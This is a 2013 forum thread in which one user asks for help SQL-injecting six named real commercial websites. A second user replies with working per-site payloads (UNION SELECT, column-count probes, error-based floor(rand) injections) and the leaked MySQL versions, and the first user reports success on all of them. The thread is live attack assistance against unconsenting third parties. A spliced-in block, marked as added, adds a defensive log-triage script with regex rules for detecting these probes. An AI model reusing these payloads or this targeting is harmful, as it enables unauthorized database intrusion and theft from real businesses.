How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
multiple can't count column or see vulnerable also in code source
Posted by: kenjii
Date: December 02, 2013 06:05PM

Hi all,
I'm having a hard time with this website.

Havij can get it, but I can't get the columns...
http://www.laptopmela.com/productDetails.php?id=1279

the same
http://www.baliwestimports.com/product-detail.php?id=119

On this one I can't see the vulnerable column in the page source:
http://www.muttluks.com/products.php?cat=-2 UNION SELECT 1111,2222,33333,4444,5555,6666,7777-- -&subcat=1

On this one I can count the columns with group by but can't see the vulnerable column; it has multiple SQL errors:
http://www.alancristea.com/bookshop.php?cat=41%20group%20by%203

Can't see the column even in the page source :(
http://www.ehcambridge.com.au/index.php?id=3 UNION SELECT 1111,2222,3333,4444,55555,6666,7777--

the same as before
http://www.thestrapsmith.com/categories.php?cat=-13 /*!5000UNION*/ /*!50000SELECT*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14
I also searched ajkaro's tutorials and tips, but I haven't seen anything about this.



Edited 4 time(s). Last edit at 12/03/2013 07:46AM by kenjii.

Re: multiple can't count column or see vulnerable also in code source
Posted by: ajkaro
Date: December 03, 2013 06:03PM

#1 string based SQLi (21 columns) - version: 5.5.33-31.1
hXXp://wXw.lap[slackers]topmela.com/productDetails.php?id=1279' group by 21%23


#2 string based SQLi (14 columns) - version: 5.1.72-log
hXXp://wXw.bali[slackers]westimports.com/product-detail.php?id=119' group by 14-- -


#3 use some other link - version: 5.0.92
hXXp://wXw.mut[slackers]tluks.com/page.php?pid=30


#4 injection in title tag - version: 5.1.69-0ubuntu0.10.04.1
hXXp://wXw.alancr[slackers]istea.com/bookshop.php?cat=41 and 0 Union SeLect concat(0x3c2f7469746c653e,version()),2,3%23


#5 user error based - version: 5.1.70-log
hXXp://wXw.ehcam[slackers]bridge.com.au/index.php?id=3 +or+1+group+by+concat_ws(0x00, version(),floor(rand(0)*2))+having+min(0)+or+1--+-

#6 There are 18 columns (not 14) - version: 5.5.34-log
hXXp://wXw.thestr[slackers]apsmith.com

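Seen from the server side, the probes in the reply above leave recognisable shapes in an access log. The following is an added example, not part of the original thread: a small log-triage script that decodes each request's query string, unwraps MySQL versioned comments such as `/*!50000SELECT*/`, and flags column-count probes, UNION SELECT, the `floor(rand(0)*2)` error-based form, `version()` fingerprinting and hex literals. The rule labels, function names and sample log lines are this example's own assumptions.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Heuristic rules for the probe shapes seen in this thread (labels are this example's own).
RULES = [
    ("column-count probe", re.compile(r"\b(?:group|order)\s+by\s+\d+\b")),
    ("union select", re.compile(r"\bunion\s+(?:all\s+)?select\b")),
    ("error-based rand/floor", re.compile(r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)")),
    ("version fingerprint", re.compile(r"\bversion\s*\(\s*\)|@@version")),
    ("hex string literal", re.compile(r"\b0x[0-9a-f]{2,}\b")),
    ("trailing sql comment", re.compile(r"--\s|--$|#\s*$")),
]
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def normalise(query):
    """Decode the query string and undo obfuscation a plain keyword match would miss."""
    s = unquote_plus(query)                                 # %27 -> ', + and %20 -> space
    s = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", s, flags=re.S)  # /*!50000SELECT*/ -> SELECT
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)            # /**/ used as whitespace
    return re.sub(r"\s+", " ", s).strip().lower()           # UnIoN   SeLeCt -> union select

def scan_line(line):
    """Return the labels of every rule matching the request in one access-log line."""
    m = REQUEST.search(line)
    if not m:
        return []
    text = normalise(urlsplit(m.group(1)).query)
    return [label for label, rx in RULES if rx.search(text)]

# Constructed sample lines (documentation IP range, made-up timestamps and sizes).
SAMPLE_LOG = [
    '192.0.2.10 - - [03/Dec/2013:18:03:00 +0000] '
    '"GET /productDetails.php?id=1279%27%20group%20by%2021%23 HTTP/1.1" 200 5120',
    '192.0.2.10 - - [03/Dec/2013:18:04:10 +0000] '
    '"GET /categories.php?cat=-13%20/*!5000UNION*/%20/*!50000SELECT*/%201,2,3 HTTP/1.1" 200 4096',
    '192.0.2.10 - - [03/Dec/2013:18:05:30 +0000] '
    '"GET /index.php?id=3+or+1+group+by+concat_ws(0x00,version(),floor(rand(0)*2))'
    '+having+min(0)+or+1--+- HTTP/1.1" 200 900',
    '192.0.2.44 - - [03/Dec/2013:18:06:00 +0000] '
    '"GET /products.php?cat=2&subcat=1 HTTP/1.1" 200 7000',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(scan_line(line) or "clean", "<-", line.split('"')[1])
```

These rules are triage heuristics: a hex literal or a `--` can appear in legitimate parameters, so weigh several hits from one client rather than a single match.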
Re: multiple can't count column or see vulnerable also in code source
Posted by: kenjii
Date: December 04, 2013 09:24AM

Thank you very much!!
I learned a lot from this; I was able to get them all :)

Just #1 gives me some problems:
http://www.laptopmela.com/productDetails.php?id=1279

I don't know why, but to make it work I need to put it in the URL directly; if I use HackBar it doesn't work for me....
